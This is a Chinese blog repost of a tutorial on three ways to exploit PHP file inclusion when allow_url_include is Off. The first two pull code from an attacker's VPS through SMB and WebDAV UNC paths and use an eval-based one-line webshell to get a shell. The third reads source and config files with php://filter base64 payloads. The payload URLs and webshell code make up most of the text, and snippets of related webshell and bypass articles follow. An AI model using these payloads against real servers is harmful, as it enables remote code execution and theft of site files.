php文件包含漏洞(allow_url_include=Off)的绕过方法

最新推荐文章于 2024-05-22 19:52:13 发布
最新推荐文章于 2024-05-22 19:52:13 发布
阅读量2.8k 收藏 3
点赞数 1
文章标签: php 操作系统
原文链接:http://www.cnblogs.com/dgjnszf/p/10956884.html
版权

分享几个当allow_url_include = Off时的文件包含漏洞的绕过方法。

假设服务端的php代码(aaa.php)如下图所示:

第1种:smb协议

Payload:http://127.0.0.1/aaa.php?path=\\43.5*.**.74\ica\abc1238.htm

这种方法只适用于Windows类型的网站服务器,不能用于Linux服务器。

首先在VPS上搭建Samba服务,然后添加一个无需认证即可访问的共享目录,配置信息如下图所示:

然后在/home/share目录创建abc1238.htm文件,文件内容为:<?php phpinfo();?>

最后启动Samba服务,访问http://127.0.0.1/aaa.php?path=\\43.5*.**.74\ica\abc1238.htm即可绕过allow_url_include = Off的限制GetShell。

第2种:WebDAV

Payload:http://127.0.0.1/aaa.php?path=\\36.*8.**.74\webdav\code.htm&cmd=phpinfo();

 

这种方法只适用于Windows类型的网站服务器,不能用于Linux服务器。

首先在VPS上搭建WebDAV环境,我是基于Ubuntu+Apache httpd搭建的WebDAV环境。

然后在WebDAV目录下创建code.htm文件,文件内容为:<?php eval($_GET['cmd']);?>

最后启动Apache httpd服务器,访问http://127.0.0.1/aaa.php?path=\\36.*8.**.74\webdav\code.htm&cmd=phpinfo();即可绕过allow_url_include = Off的限制GetShell。

第3种:php://filter/

利用php://filter/不能直接GetShell,但可以读取网站php代码文件,然后进行代码分析。或读取网站配置文件等其他重要文件。

Payload:

http://127.0.0.1/aaa.php?path=php://filter/read=convert.base64-encode/resource=D:/phpStudy/WWW/index.php

http://192.168.56.130/aaa.php?path=php://filter/read=convert.base64-encode/resource=/var/www/html/index.php

执行上述Payload会将D:/phpStudy/WWW/drupal-7.54/index.php文件以base64编码形式返回。

这种方法在Linux和Windows服务器都可以。

 

这几种绕过方法都是从大佬那里偷师学艺学来的,附带参考链接:

https://helpcenter.onlyoffice.com/server/community/connect-webdav-server-ubuntu.aspx

https://www.cnblogs.com/iamstudy/articles/include_file.html

https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/

https://www.leavesongs.com/PENETRATION/php-filter-magic.html

http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html

 

转载于:https://www.cnblogs.com/dgjnszf/p/10956884.html

weixin_30323961
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP远程文件包含(RFI)并绕过远程URL包含限制
Ms08067安全实验室
04-06 1648
文章来源|MS08067 公众号粉丝投稿本文作者:VastSky(Ms08067实验室粉丝)前言本文我们讲如何绕过远程URL包含限制。在PHP开发环境php.ini配置文里”allow_u...
php双写绕过,任意文件包含漏洞绕过方式
weixin_35796591的博客
03-10 1060
本文转自行云博客https://www.xy586.top/文章目录前期准备长目录截断原理payload%00截断原理payload基于session机制传马条件:payload总结前期准备file.php代码$a = $_GET['a'];include($a.'.html');?>hack.php代码fputs(fopen('shell.php','w'),'');?>长目录截断原...
php文件包含绕过,文件包含漏洞(绕过姿势) | nmask's Blog
weixin_35094408的博客
03-18 745
谁将烟焚散,散了纵横的牵绊文件包含漏洞是渗透测试过程中用得比较多的一个漏洞,主要用来绕过waf上传木马文件。今日在逛Tools论坛时,发现了一种新型的文件包含姿势,在此记录分享,并附上一些文件包含漏洞的基础利用姿势。特殊姿势利用phar://协议特性可以在渗透过程中帮我们绕过一些waf检测,phar:// 数据流包装器自 PHP 5.3.0 起开始有效,貌似可以绕过安全狗。利用过程新建shell....
Web安全实践靶场系统-RCE
最新发布
weixin_54704073的博客
05-22 1334
且file7.php返回了报错,通过这个报错,可以知道fi_local.php中用来进行文件包含的函数是include(),并且包含文件路径为与fi_local.php文件夹下include文件夹中的文件。开始去查找警告存在的问题,从警告中可以看到说是 php.ini 文件中的allow_url_include 没有打开,找到警告中说的文件php.ini。修改完之后,将小皮的套件重启。尝试写入一句话木马,格式为txt文本,前面讲到不能包含同后缀的文件,是把其他类型的文件当成 php 解析。
[转载]allow_url_include
liNewman的博客
11-23 527
[转载]allow_url_include 原文地址:allow_url_include作者:粤之豪  allow_url_include "0" PHP_INI_ALL PHP_INI_SYSTEM in PHP 5. Available since PHP 5.2.0.    默认状态是关闭的。在php.ini 修改为;  ...
fopen打开ftp文件_PHP RFI allow_url_include 远程文件包含漏洞
weixin_39609887的博客
11-25 387
一、漏洞概述php默认配置中”allow_url_include”默认设置为关闭,使PHP无法加载远程http(s)或FTP url,防止文件包含攻击。即使” allow_url_include”和” allow_url_fopen”都Off也不会阻止SMB URL的加载。当有漏洞PHP程序,试图从攻击者的SMB共享中加载文件时,如果SMB共享允许访问该文件。攻击者需要将SMB服务器...
搭建Apache+MySQL+PHP平台.rar_4 3 2 1_Ubuntu搭建_apache2.2.4_php
09-21
php_admin_flag allow_url_fopen Off php_value include_path . php_admin_value upload_max_filesize 2M php_admin_value post_max_size 8M php_admin_value max_execution_time 300 ...
centos中的php.ini文件
12-11
allow_call_time_pass_reference = Off safe_mode = Off safe_mode_gid = Off safe_mode_include_dir = safe_mode_exec_dir = safe_mode_allowed_env_vars = PHP_ safe_mode_protected_env_vars = LD_LIBRARY_PATH ...
PHP使用流包装器实现WebShell的方法
10-18
然而,当`allow_url_include`设置为`Off`时,包含远程代码的行为将被禁止。但PHP的流包装器提供了一种替代途径。例如,`php://input`可以用来读取HTTP请求体的内容。通过自定义流包装器并利用`stream_wrapper_...
php-fpm开启状态统计的方法详解
10-19
**PHP-FPM 开启状态统计方法** PHP-FPM (FastCGI Process Manager) 是 PHP 的一个组件,用于管理和控制 PHP 的 FastCGI 进程。它允许管理员监控 PHP-FPM 的运行状态,以便进行性能优化和故障排查。下面将详细介绍...
Register Globals不是PHP安全漏洞也是安全风险
03-04
如果同时`allow_url_fopen`选项也开启,攻击者可以利用这一点执行远程代码,这在某些知名的开源项目中也曾被发现。 为了避免这些风险,最佳实践是: 1. **始终禁用`register_globals`**:在php.ini配置文件中将`...
文件包含漏洞-02】文件包含漏洞分类与原理及其空字符安全绕过实验
cc
02-22 3045
文件包含(file inclusion)漏洞,当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。本地文件包含LFI(local file inclusion):当被包含文件在服务器本地时,可以通过文件路径(相对或绝对)加载(读取和打开)文件,就形成本地文件包含
文件包含漏洞绕过方法(以php为例)
热门推荐
HMX404的博客
09-27 1万+
一,文件包含漏洞的由来 简单的来说,为了减少“重复造轮子”引入了文件包含函数,可以直接使用文件中的文件和代码。当通过动态获文件时,或者需要引用网络上其他文件时,用户通过对变量值的修改访问规定的文件,但是未对变量值进行校验,导致有了可乘之机,一般在php中常见。 <?php $file = $_GET('file'); include($file); #除此之外还有Include_once;require;require_once;highlight_file; #show_source;readfil
allow_url_include和allow_url_fopen 详解
qq_29566629的博客
08-04 8317
今天学习文件包含漏洞的时候,在php.ini配置文件就会接触到allow_url_include和allow_url_fopen这两个设置,非常有必要了解一下。 allow_url_fopen = On 是否允许将URL(如http://或ftp://)作为文件处理。 allow_url_include = Off 是否允许include/require打开URL(如http://或ftp://)作为文件处理。 注意: 从PHP5.2开始allow_url_include就默认为Off了,而allow_ur
渗透测试 | php的webshell绕过方法总结
2301_80115097的博客
12-26 240
这里设置一个用户自定义函数a,当里面有参数时,返回该参数的内容,这里shell里的a($_REQUEST)[1] 的实际效果为 a($_REQUEST),相当于是a($a),会返回$a的内容,结果为$_REQUEST,最后一行的实际内容为eval($_REQUEST[1]);测试可以正常连接phpclass User?
文件包含漏洞03】文件包含漏洞的空字符绕过及六种利用方式
Fighting_hawk的博客
03-11 5100
1. 关于图片马的几种执行方式总结: (1)利用中间件解析漏洞,不同中间件不同版本的利用方式往往不同。 (2)利用.htaccess修改Apache局部配置。 (3) 利用文件包含执行漏洞。 2. 了解PHP魔术引号的作用。 3. 掌握文件包含漏洞空字符绕过方法。 4. 掌握文件包含漏洞的六种利用方式。...
allow_url_include和allow_url_fopen
BAM9090的博客
09-11 2461
allow_url_fopen没什么好说的,主要是allow_url_includePHP5.2开始allow_url_include就默认为Off了,而allow_url_fopen一直是On的,也没有什么人无聊的去打开allow_url_include吧 不过还是了解一下比较好 当allow_url_include为On且allow_url_fopen为...
文件包含漏洞
qq_63267612的博客
04-24 2641
文章目录本地包含远程文件包含 原理: 文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 这个漏洞最重要的有四个函数: 1、include() 当使用该函数包含文件时,只有代码执行到 include()函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。 2、include_once() 功能和 include()相同,区别在于当重复调用同一文件时,程序只调用一次。 3、requi
DVWA安装后File Inclusion出现问题The PHP function allow_url_include is not enabled.
Aevery的博客
12-21 1万+
在安装DVWA来做实验环境时,在File Inclusion模块出现The PHP function allow_url_include is not enabled. 这里贴出来,方便以后遇到的小伙伴们。 解决问题办法,修改php.ini配置文件 我的事kali上面,使用find / -name php.ini //查找路径 vi XXXX/php.ini  //修改配置文件 在配置文
allow_url_fopen = on allow_url_include = on
03-16
这是两个PHP配置选项,用于允许在PHP脚本中使用URL打开和包含文件。如果将它们设置为“on”,则可以在脚本中使用像“include 'http://example.com/file.php';”这样的语句。但是,这也会增加安全风险,因为它允许脚本从远程服务器获取代码并执行它。因此,建议仅在必要时启用这些选项,并确保只从可信任的源获取代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值